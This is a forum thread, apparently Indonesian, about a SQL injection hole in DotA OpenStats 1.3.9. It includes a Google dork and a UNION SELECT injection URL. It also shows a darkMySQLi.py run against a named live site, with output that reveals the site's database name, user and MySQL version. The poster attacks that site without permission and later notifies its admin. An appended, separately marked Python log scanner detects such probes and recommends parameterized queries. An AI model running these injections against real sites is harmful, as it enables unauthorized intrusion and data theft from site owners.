Bug in DOTA CMS sites ..
At first I was just browsing db-exploit .. and came across an exploit found by fellow Indonesians ..

# Exploit Title: DotA OpenStats SQL Injection Vulnerability
# Google Dork: "© 2011 Powered by DotA OpenStats"
# Date: 19/12/2011
# Author: HvM17
# Version: 1.3.9 and below
# Tested on: WinXP

# VenDor : http://openstats.iz.rs/
# Download script: https://sourceforge.net/projects/dotaopenstats/

[~] Exploit

http://localhost/dotaStats/index.php?id='1 UNION SELECT 1,2,3,4

Greetz for All HVM crew :)

Looks like this is some kind of DotA site :P

I immediately tried it on one of the sites that uses this vendor's CMS ..


Yup, a MySQL error showed up right away.

Consistent with the exploit .. I found 4 columns .. I tried using d4rkMySQLi.py ...

cassaprodigy@l3l3r{/pentest/web/darkmysqli}:python DarkMySQLi.py -u http://rank.battlenet.web.id/index.php?id=1 --findcol

| [email protected]                         v1.6   |
|   1/2009      darkMySQLi.py                      |
|     -- Multi Purpose MySQL Injection Tool --     |
| Usage: darkMySQLi.py [options]                   |
|                      -h help       darkc0de.com  |

[+] URL: http://rank.battlenet.web.id/index.php?id=1
[+] 16:03:44
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Microsoft Internet Explorer/4.0b1 (Windows 95)
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 1,2,3,4,
[+] Column Length is: 4
[+] Found null column at column #: 1,2,3,

[!] SQLi URL: http://rank.battlenet.web.id/index.php?id=1+AND+1=2+UNION+SELECT+1,2,3,4--
[!] darkMySQLi URL: http://rank.battlenet.web.id/index.php?id=1+AND+1=2+UNION+SELECT+darkc0de,darkc0de,darkc0de,4--

Digging further, it turned out to go even deeper ...

[+] Gathering MySQL Server Configuration...
    Database: battlene_bot-godlike
    User: [email protected]
    Version: 5.0.92-community-log

I have already PMed the admin, hopefully it gets patched .. because as far as I know lebay.web.id is a fairly well-known gaming site ..

There are more .. please PM the admins ..


Mostly Indonesian sites.. there are many more sites with the same hole... sigh ..

Wow, that's really kind of you to let the admin know. Usually in the underground groups on FB, the index page would just end up getting defaced instead..

Hehehe, it's different here, bro.... defacing is forbidden here :P .. if possible, help the admin so they can patch ... for Indonesian sites specifically

Keep up the constructive spirit :)

(12-24-2011, 05:41 PM)cassaprodigy Wrote: At first I was just browsing db-exploit .. and came across an exploit found by fellow Indonesians ..

So that IT in Indonesia moves forward.
Long live Indonesian IT.
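
Added example, not part of the original thread and not DotA OpenStats code: a log check an admin of an affected site could run to find requests like the ones in the first post, where the `id` parameter of `index.php` carries anything other than a plain integer. The log lines are constructed, and the names `scan` and `classify` and the "combined" access-log format are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache/nginx "combined" format (documentation IPs).
SAMPLE_LOG = """\
192.0.2.10 - - [24/Dec/2011:16:01:02 +0700] "GET /index.php?id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [24/Dec/2011:16:03:40 +0700] "GET /index.php?id=%271 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
198.51.100.7 - - [24/Dec/2011:16:03:44 +0700] "GET /index.php?id=1+AND+1=2+UNION+SELECT+1,2,3,4-- HTTP/1.1" 200 4977 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
192.0.2.10 - - [24/Dec/2011:16:05:00 +0700] "GET /index.php?u=42 HTTP/1.1" 200 3001 "-" "Mozilla/5.0"
192.0.2.33 - - [24/Dec/2011:16:06:10 +0700] "GET /index.php?id=abc HTTP/1.1" 200 790 "-" "Mozilla/5.0"
"""

# client IP, timestamp, request target (method and protocol are skipped)
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+) [^"]*"')
UNION_RE = re.compile(r"\bunion\b.+\bselect\b", re.I | re.S)

def classify(value):
    """Return None for a plain integer id, otherwise a reason string."""
    if re.fullmatch(r"\d{1,10}", value):
        return None
    if UNION_RE.search(value):
        return "union-select"
    if any(c in value for c in "'\"`"):
        return "quote"
    return "non-integer"

def scan(log_text, param="id"):
    """Return (ip, timestamp, reason, decoded value) for every suspicious request."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        ip, when, target = m.groups()
        # parse_qs URL-decodes, so %27 becomes ' and + becomes a space
        query = parse_qs(urlsplit(target).query, keep_blank_values=True)
        for value in query.get(param, []):
            reason = classify(value)
            if reason:
                findings.append((ip, when, reason, value))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding, sep=" | ")
```

The log check only shows who has been probing; the fix belongs in the application, which should treat `id` as an integer and pass it to the database through a parameterized query.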
